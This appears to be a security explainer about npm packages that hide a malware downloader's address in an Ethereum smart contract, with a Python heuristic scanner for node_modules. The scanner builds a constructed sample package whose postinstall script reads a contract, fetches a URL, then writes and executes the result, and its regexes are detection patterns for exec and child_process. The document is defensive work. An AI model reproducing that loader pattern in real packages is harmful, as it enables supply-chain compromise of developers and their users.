What happened?
Researchers at the software supply-chain security firm ReversingLabs have found malicious packages published to the npm registry that use Ethereum smart contracts to hide where their second-stage malware comes from. The two most notable, “colortoolsv2” and “mimelib2”, read data stored in a smart contract to obtain the address of a downloader, which then fetches and installs further malware on the machine that installed the package. Note that these are malicious packages uploaded by the attackers, not vulnerabilities in existing, widely used libraries. Because the address lives on-chain rather than in the package, it does not appear in the published source, and the operator can change it without publishing a new package version, which is what makes the technique hard to spot with a casual review.
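The loader pattern described above has a recognisable shape: an install-time script, a read from an Ethereum contract, and then a download or dynamic execution of whatever came back. The script below is an added example of a heuristic audit over an installed node_modules tree that looks for exactly that combination; it is not ReversingLabs' tooling or code from the packages named above. The two sample packages it builds (“balance-helper” and “example-colortools”), their contract address and RPC URL are all constructed for the demonstration, and the regexes are heuristics that will flag legitimate dApp helpers which fetch data and talk to a contract, so treat hits as leads for manual review rather than verdicts.

```python
"""Heuristic audit for npm packages that read from an Ethereum contract and
then download or execute code, especially from an install hook.

Added example, not ReversingLabs' tooling. Sample packages are constructed."""
import json
import os
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Signs the code reads from a chain (ethers.js / web3.js / raw JSON-RPC).
CHAIN_READ = re.compile(
    r"ethers\.Contract|web3\.eth\.Contract|eth_call|JsonRpcProvider", re.I)
# Signs the code pulls remote content at runtime.
REMOTE_FETCH = re.compile(r"\bfetch\(|https?\.get\(|axios\.", re.I)
# Signs the code executes something it did not ship with.
DYN_EXEC = re.compile(
    r"\beval\(|new Function\(|child_process|\bexec(Sync)?\(|\bspawn(Sync)?\(|vm\.runIn", re.I)


def scan_package(pkg_dir):
    """Return findings for one package directory, or None if nothing suspicious."""
    with open(os.path.join(pkg_dir, "package.json")) as f:
        meta = json.load(f)
    scripts = meta.get("scripts", {})
    hooks = {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}

    source = ""
    for root, _, files in os.walk(pkg_dir):
        for name in files:
            if name.endswith((".js", ".cjs", ".mjs")):
                with open(os.path.join(root, name), errors="replace") as f:
                    source += f.read() + "\n"

    signals = {
        "install_hook": bool(hooks),
        "chain_read": bool(CHAIN_READ.search(source)),
        "remote_fetch": bool(REMOTE_FETCH.search(source)),
        "dynamic_exec": bool(DYN_EXEC.search(source)),
    }
    # The loader needs the chain read *and* a way to act on what it read.
    suspicious = signals["chain_read"] and (signals["remote_fetch"] or signals["dynamic_exec"])
    if not suspicious:
        return None
    # Running at install time is the worst case: code executes before anyone reads it.
    level = "high" if signals["install_hook"] else "medium"
    return {"name": meta.get("name", os.path.basename(pkg_dir)),
            "level": level, "hooks": hooks, "signals": signals}


def scan_node_modules(node_modules):
    """Scan every top-level package under node_modules; return the flagged ones."""
    findings = []
    for entry in sorted(os.listdir(node_modules)):
        pkg_dir = os.path.join(node_modules, entry)
        if os.path.isfile(os.path.join(pkg_dir, "package.json")):
            result = scan_package(pkg_dir)
            if result:
                findings.append(result)
    return findings


def _write(path, text):
    with open(path, "w") as f:
        f.write(text)


def write_sample_tree():
    """Constructed node_modules: one benign dApp helper, one loader-style package."""
    nm = os.path.join(tempfile.mkdtemp(prefix="npm-audit-"), "node_modules")
    # Benign: reads a contract at runtime, no install hook, never executes fetched data.
    benign = os.path.join(nm, "balance-helper")
    os.makedirs(benign)
    _write(os.path.join(benign, "package.json"),
           json.dumps({"name": "balance-helper", "version": "1.0.0"}))
    _write(os.path.join(benign, "index.js"),
           "const { ethers } = require('ethers');\n"
           "module.exports = (addr, abi, rpc) => new ethers.Contract(addr, abi,\n"
           "  new ethers.JsonRpcProvider(rpc)).balanceOf(addr);\n")
    # Loader-style (hypothetical name): postinstall hook, contract read, then download + run.
    loader = os.path.join(nm, "example-colortools")
    os.makedirs(loader)
    _write(os.path.join(loader, "package.json"),
           json.dumps({"name": "example-colortools", "version": "2.0.0",
                       "scripts": {"postinstall": "node setup.js"}}))
    _write(os.path.join(loader, "setup.js"),
           "const { ethers } = require('ethers');\n"
           "const { execSync } = require('child_process');\n"
           "// Zero address and rpc.example are placeholders, not a real contract or endpoint.\n"
           "const c = new ethers.Contract('0x0000000000000000000000000000000000000000',\n"
           "  ['function get() view returns (string)'], new ethers.JsonRpcProvider('https://rpc.example'));\n"
           "c.get().then(async url => { const r = await fetch(url);\n"
           "  require('fs').writeFileSync('stage2', Buffer.from(await r.arrayBuffer()));\n"
           "  execSync('./stage2'); });\n")
    return nm


if __name__ == "__main__":
    print(json.dumps(scan_node_modules(write_sample_tree()), indent=2))
```

Run it against a real tree with `scan_node_modules("path/to/node_modules")`; a cheaper first cut in CI is to install with `npm ci --ignore-scripts` and review any package whose lifecycle hooks this script reports before allowing them to run.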
Who does this affect?
This primarily affects developers who installed these packages, and in turn the companies and end users of the software built on machines where the downloader ran, since malware on a developer workstation or CI runner gives the attacker a foothold in whatever that machine builds, signs or deploys. It also erodes trust in the wider npm ecosystem. Ethereum users are not harmed by the smart contracts themselves: the contracts only store data for the malware to read, so interacting with the network does not infect anyone; the risk comes from installing the packages. npm, as the registry that distributed the packages, and GitHub, which hosted related repositories, are affected in that they must detect and remove such content.
Why does this matter?
A downloader running on a developer machine can expose credentials, API keys, wallet keys and source code, leading to data breaches, financial losses and fraud well beyond the initial victim. Hiding the payload location in a smart contract also gives the attacker resilient, hard-to-take-down infrastructure, since the on-chain data cannot simply be removed the way a malicious domain can. Furthermore, incidents like this weaken trust in Ethereum-based projects and in the broader open-source community, which can slow innovation and adoption within the cryptocurrency and blockchain sector. For practitioners, the concrete lesson is to treat install-time scripts that reach out to a blockchain RPC endpoint as a red flag, and to pin and review new dependencies before they are allowed to run code.